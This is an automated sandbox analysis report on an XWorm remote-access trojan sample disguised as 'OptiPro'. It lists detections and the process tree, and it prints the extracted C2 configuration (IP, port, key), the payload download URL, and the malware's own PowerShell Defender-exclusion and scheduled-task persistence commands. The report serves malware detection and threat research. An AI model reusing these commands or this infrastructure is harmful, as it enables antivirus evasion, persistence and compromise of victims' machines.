Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
r4RF3TX5Mi.exe

Overview

General Information

Sample name:r4RF3TX5Mi.exe
renamed because original name is a hash value
Original sample name:a17ed4e602b0d341fc887925bba26643.exe
Analysis ID:1526374
MD5:a17ed4e602b0d341fc887925bba26643
SHA1:c1045ad67c2b0695a30e3221cf8be3f290791088
SHA256:ce247f59aefa2dcc85f22d76cafcebc7201a00f0f9d251787cd7e2254863abb1
Tags:exeuser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • r4RF3TX5Mi.exe (PID: 6440 cmdline: "C:\Users\user\Desktop\r4RF3TX5Mi.exe" MD5: A17ED4E602B0D341FC887925BBA26643)
    • conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • OptiProV2.exe (PID: 7192 cmdline: "C:\Program Files\Common Files\OptiProV2.exe" MD5: DB6CA1D9FC6E01AF5D2ED709C6B17516)
      • powershell.exe (PID: 7308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OptiProV2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Opti.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Opti.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1876 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Opti" /tr "C:\Users\user\AppData\Local\Opti.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Opti.exe (PID: 1860 cmdline: C:\Users\user\AppData\Local\Opti.exe MD5: DB6CA1D9FC6E01AF5D2ED709C6B17516)
  • Opti.exe (PID: 2236 cmdline: C:\Users\user\AppData\Local\Opti.exe MD5: DB6CA1D9FC6E01AF5D2ED709C6B17516)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "147.185.221.21"], "Port": "4140", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.3"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files\Common Files\OptiProV2.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Program Files\Common Files\OptiProV2.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xf52a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xf5c7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xf6dc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xecce:$cnc4: POST / HTTP/1.1
    C:\Users\user\AppData\Local\Opti.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Opti.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xf52a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xf5c7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xf6dc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xecce:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000B.00000002.2523471436.0000000012AF8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        0000000B.00000002.2523471436.0000000012AF8000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x10fea:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x11087:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x1119c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x1078e:$cnc4: POST / HTTP/1.1
        0000000B.00000000.1357544208.00000000009A2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          0000000B.00000000.1357544208.00000000009A2000.00000002.00000001.01000000.00000006.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xf32a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xf3c7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xf4dc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xeace:$cnc4: POST / HTTP/1.1
          Process Memory Space: OptiProV2.exe PID: 7192JoeSecurity_XWormYara detected XWormJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.0.OptiProV2.exe.9a0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              11.0.OptiProV2.exe.9a0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xf52a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xf5c7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xf6dc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xecce:$cnc4: POST / HTTP/1.1
              11.2.OptiProV2.exe.12af9ac0.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                11.2.OptiProV2.exe.12af9ac0.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xf52a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xf5c7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xf6dc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xecce:$cnc4: POST / HTTP/1.1
                11.2.OptiProV2.exe.12af9ac0.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Common Files\OptiProV2.exe" , ParentImage: C:\Program Files\Common Files\OptiProV2.exe, ParentProcessId: 7192, ParentProcessName: OptiProV2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', ProcessId: 7308, ProcessName: powershell.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Common Files\OptiProV2.exe" , ParentImage: C:\Program Files\Common Files\OptiProV2.exe, ParentProcessId: 7192, ParentProcessName: OptiProV2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', ProcessId: 7308, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Common Files\OptiProV2.exe" , ParentImage: C:\Program Files\Common Files\OptiProV2.exe, ParentProcessId: 7192, ParentProcessName: OptiProV2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', ProcessId: 7308, ProcessName: powershell.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Opti" /tr "C:\Users\user\AppData\Local\Opti.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Opti" /tr "C:\Users\user\AppData\Local\Opti.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files\Common Files\OptiProV2.exe" , ParentImage: C:\Program Files\Common Files\OptiProV2.exe, ParentProcessId: 7192, ParentProcessName: OptiProV2.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Opti" /tr "C:\Users\user\AppData\Local\Opti.exe", ProcessId: 1876, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Common Files\OptiProV2.exe" , ParentImage: C:\Program Files\Common Files\OptiProV2.exe, ParentProcessId: 7192, ParentProcessName: OptiProV2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\OptiProV2.exe', ProcessId: 7308, ProcessName: powershell.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Opti.exeAvira: detection malicious, Label: TR/Dropper.Gen
                  Source: C:\Program Files\Common Files\OptiProV2.exeAvira: detection malicious, Label: TR/Dropper.Gen
                  Found malware configuration
                  Source: 0000000B.00000002.2523471436.0000000012AF8000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "147.185.221.21"], "Port": "4140", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.3"}
                  Multi AV Scanner detection for domain / URL
                  Source: 147.185.221.21Virustotal: Detection: 18%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Program Files\Common Files\OptiProV2.exeReversingLabs: Detection: 91%
                  Source: C:\Program Files\Common Files\OptiProV2.exeVirustotal: Detection: 77%Perma Link
                  Source: C:\Users\user\AppData\Local\Opti.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Opti.exeVirustotal: Detection: 77%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: r4RF3TX5Mi.exeReversingLabs: Detection: 36%
                  Source: r4RF3TX5Mi.exeVirustotal: Detection: 50%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Opti.exeJoe Sandbox ML: detected
                  Source: C:\Program Files\Common Files\OptiProV2.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 11.0.OptiProV2.exe.9a0000.0.unpackString decryptor: 127.0.0.1,147.185.221.21
                  Source: 11.0.OptiProV2.exe.9a0000.0.unpackString decryptor: 4140
                  Source: 11.0.OptiProV2.exe.9a0000.0.unpackString decryptor: anti2763
                  Source: 11.0.OptiProV2.exe.9a0000.0.unpackString decryptor: <Xwormmm>
                  Source: 11.0.OptiProV2.exe.9a0000.0.unpackString decryptor: XWorm V5.3
                  Source: 11.0.OptiProV2.exe.9a0000.0.unpackString decryptor: USB.exe
                  Source: 11.0.OptiProV2.exe.9a0000.0.unpackString decryptor: %LocalAppData%
                  Source: 11.0.OptiProV2.exe.9a0000.0.unpackString decryptor: Opti.exe
                  Source: C:\Users\user\Desktop\r4RF3TX5Mi.exeDirectory created: C:\Program Files\Common Files\OptiProV2.exeJump to behavior
                  Source: r4RF3TX5Mi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\hesa\Downloads\Stuff\OptiPro\KreYzeSpoofer\obj\x64\Release\OptiPro.pdb source: r4RF3TX5Mi.exe

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 127.0.0.1
                  Source: Malware configuration extractorURLs: 147.185.221.21
                  Source: global trafficTCP traffic: 192.168.2.7:56794 -> 147.185.221.21:4140
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 05 Oct 2024 12:36:16 GMTServer: Apache/2.4.62 (Debian)Last-Modified: Tue, 01 Oct 2024 07:49:17 GMTETag: "200000-623658ef3c1fc"Accept-Ranges: bytesContent-Length: 2097152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 be a7 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 06 01 00 00 86 00 00 00 00 00 00 4e 25 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 02 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 24 01 00 4f 00 00 00 00 40 01 00 0e 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 05 01 00 00 20 00 00 00 06 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 0e 83 00 00 00 40 01 00 00 84 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 01 00 00 02 00 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 25 01 00 00 00 00 00 48 00 00 00 02 00 05 00 48 5e 00 00 b4 c6 00 00 01 00 00 00 26 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 18 00 00 0a 2a 1a 72 01 00 00 70 2a 1a 20 53 08 dd 04 2a 1e 02 28 19 00 00 0a 2a 1a 72 45 00 00 70 2a 1a 20 1a 78 21 05 2a a6 73 1a 00 00 0a 80 01 00 00 04 73 1b 00 00 0a 80 02 00 00 04 73 1c 00 00 0a 80 03 00 00 04 73 1d 00 00 0a 80 04 00 00 04 2a 1a 72 89 00 00 70 2a 1a 20 fb bc 56 04 2a 1a 72 cd 00 00 70 2a 1a 20 b7 4f 04 02 2a 1a 72 11 01 00 70 2a 1a 20 ed b6 51 02 2a 1a 72 55 01 00 70 2a 1a 20 45 2f 8d 02 2a 1a 72 99 01 00 70 2a 1a 20 9a 0c 8f 05 2a 1e 02 28 28 00 00 0a 2a 1a 72 d3 03 00 70 2a 1a 20 8d 98 98 04 2a 1a 72 17 04 00 70 2a 1a 20 e1 e7 65 05 2a 22 28 b0 00 00 06 2b 00 2a 26 28 03 01 00 06 26 2b 00 2a ee 2b 35 73 4e 00 00 0a 20 b8 0b 00 00 20 10 27 00 00 6f 4f 00 00 0a 28 2c 00 00 0a 7e 12 00 00 04 2d 0a 28 47 00 00 06 28 39 00 00 06 7e 18 00 00 04 6f 50 00 00 0a 26 17 2d c8 2a 1a 72 3d 06 00 70 2a 1a 20 2a 70 7b 01 2a 1a 72 81 06 00 70 2a 1a 20 59 81 62 03 2a 1a 72 c5
                  Source: global trafficHTTP traffic detected: GET /OptiProV2.exe HTTP/1.1Host: 15.235.206.13Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 147.185.221.21 147.185.221.21
                  Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                  Source: unknownDNS traffic detected: query: 18.31.95.13.in-addr.arpa replaycode: Name error (3)
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 15.235.206.13
                  Source: global trafficHTTP traffic detected: GET /OptiProV2.exe HTTP/1.1Host: 15.235.206.13Connection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                  Source: r4RF3TX5Mi.exe, 00000001.00000002.1360571480.0000020DA8607000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.235.206.13
                  Source: r4RF3TX5Mi.exe, 00000001.00000002.1360571480.0000020DA8581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://15.235.206.13/OptiProV2.exe
                  Source: r4RF3TX5Mi.exeString found in binary or memory: http://15.235.206.13/OptiProV2.exeWC:
                  Source: powershell.exe, 0000000C.00000002.1596115669.00000225CE84E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1723679435.00000212C4BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                  Source: powershell.exe, 00000010.00000002.1726278208.00000212C4E70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                  Source: powershell.exe, 00000010.00000002.1726278208.00000212C4E70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                  Source: powershell.exe, 0000000C.00000002.1587825867.00000225C60E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1710868001.00000212BC7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1890195200.0000021697FC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2130635621.000001251006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000017.00000002.1972585830.000001250022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
